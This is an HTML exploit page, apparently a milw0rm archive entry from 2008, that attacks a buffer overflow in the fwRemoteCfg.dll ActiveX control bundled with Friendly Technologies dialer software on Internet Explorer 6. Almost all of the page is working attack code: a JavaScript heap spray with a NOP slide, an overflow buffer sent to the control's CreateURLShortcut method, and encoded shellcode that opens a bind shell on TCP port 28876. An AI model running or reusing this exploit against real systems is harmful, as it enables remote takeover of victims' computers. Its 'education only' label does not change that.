71 lines
No EOL
3.4 KiB
HTML
71 lines
No EOL
3.4 KiB
HTML
<!--
|
|
"Friendly Technologies" provide software like L2TP and PPPoE clients to ISPs,
|
|
who give the software to their customers on CD so they have less trouble setting up thire connections.
|
|
They also provide remote configuration solutions .. not the best idea if you ask me.
|
|
|
|
An overflow exists in fwRemoteCfg.dll provided with the dialer,
|
|
an example of the dialer can be found here:
|
|
|
|
==========================================================
|
|
|| Greetz to the binaryvision crew ||
|
|
|| Come visit @ http://www.binaryvision.org.il ||
|
|
|| or IRC at irc.nix.co.il / #binaryvision ||
|
|
==========================================================
|
|
|
|
* Tested on WinXP SP2 using IE6.
|
|
** For Education ONLY!
|
|
*** Written by spdr. (spdr01 [at] gmail.com)
|
|
-->
|
|
|
|
<html>
|
|
<title>Friendly Technologies - wayyy too friendly...</title>
|
|
|
|
<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B" id="sucker"></object>
|
|
<input type="button" value="Exploit!" onClick="exploit()">
|
|
|
|
<script>
|
|
function exploit() {
|
|
var Evil = ""; // Our Evil Buffer
|
|
var DamnIE = "\x0C\x0C\x0C\x0C"; // Damn IE changes address when not in the 0x00 - 0x7F range :(
|
|
// Need to use heap spray rather than overwrite EIP ...
|
|
|
|
// Skyland win32 bindshell (28876/tcp) shellcode
|
|
var ShellCode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
|
|
|
|
var payLoadSize = ShellCode.length * 2; // Size of the shellcode
|
|
var SprayToAddress = 0x0C0C0C0C; // Spray up to there, could make it shorter.
|
|
|
|
var spraySlide = unescape("%u9090%u9090"); // Nop slide
|
|
var heapHdrSize = 0x38; // size of heap header blocks in MSIE, hopefully.
|
|
var BlockSize = 0x100000; // Size of each block
|
|
var SlideSize = BlockSize - (payLoadSize + heapHdrSize); // Size of the Nop slide
|
|
var heapBlocks = (SprayToAddress - 0x100000) / BlockSize; // Number of blocks
|
|
|
|
spraySlide = MakeNopSlide(spraySlide, SlideSize); // Create our slide
|
|
|
|
|
|
// [heap header][nopslide][shellcode]
|
|
memory = new Array();
|
|
for (k = 0; k < heapBlocks; k++)
|
|
memory[k] = spraySlide + ShellCode;
|
|
|
|
// Create Evil Buffer
|
|
while(Evil.length < 800)
|
|
Evil += "A";
|
|
Evil += DamnIE;
|
|
|
|
// Pwn
|
|
sucker.CreateURLShortcut("con", "con", Evil, 1); // Using 'con' as filename, we dont really want to make a file.
|
|
}
|
|
|
|
function MakeNopSlide(spraySlide, SlideSize){
|
|
while(spraySlide.length * 2 < SlideSize)
|
|
spraySlide += spraySlide;
|
|
spraySlide = spraySlide.substring(0, SlideSize / 2);
|
|
return spraySlide;
|
|
}
|
|
</script>
|
|
|
|
</html>
|
|
|
|
# milw0rm.com [2008-08-28] |